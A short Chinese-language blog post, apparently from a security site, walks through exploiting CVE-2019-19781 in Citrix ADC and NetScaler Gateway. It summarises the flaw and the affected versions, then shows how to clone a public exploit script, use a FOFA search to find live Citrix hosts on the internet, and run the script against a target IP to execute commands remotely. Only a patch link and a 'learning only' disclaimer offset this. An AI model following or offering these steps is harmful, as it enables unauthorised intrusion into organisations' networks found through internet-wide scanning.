CVE-2019-19781 简单利用

华盟原创文章投稿奖励计划

Citrix Systems Citrix ADC and NetScaler Gateway等都是美国思杰系统(Citrix Systems)公司的产品。Citrix ADC and NetScaler Gateway是一款应用交付控制器。该产品具有应用交付控制和负载均衡等功能。安全专家在Citrix Application Delivery Controller和Citrix Gateway产品中发现一个严重的代码执行漏洞,该漏洞使158个国家的超过8万家公司面临风险。由于利用该漏洞攻击者无需身份验证即可访问公司的内部网络,因此该漏洞尤其危险。成功利用该漏洞可导致任意代码执行。

自动草稿

影响版本
Citrix ADC和Citrix Gateway13.0版本
Citrix ADC和NetScaler Gateway12.1版本
Citrix ADC和NetScaler Gateway12.0版本
Citrix ADC和NetScaler Gateway11.1版本
Citrix NetScaler ADC和NetScaler Gateway10.5版本
漏洞利用
kali下载CVE-2019-19781脚本
git clone 

https://github.com/projectzeroindia/CVE-2019-19781

自动草稿

查找具备漏洞版本的目标,这里利用FOFA搜索的 title="Citrix" 关键信息

自动草稿

利用CVE-2019-19781脚本,攻击测试并查看目标目录 
bash CVE-2019-19781.sh 目标IP 'ls'

自动草稿

修复建议
https://support.citrix.com/article/CTX267679
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/255323.html

发表评论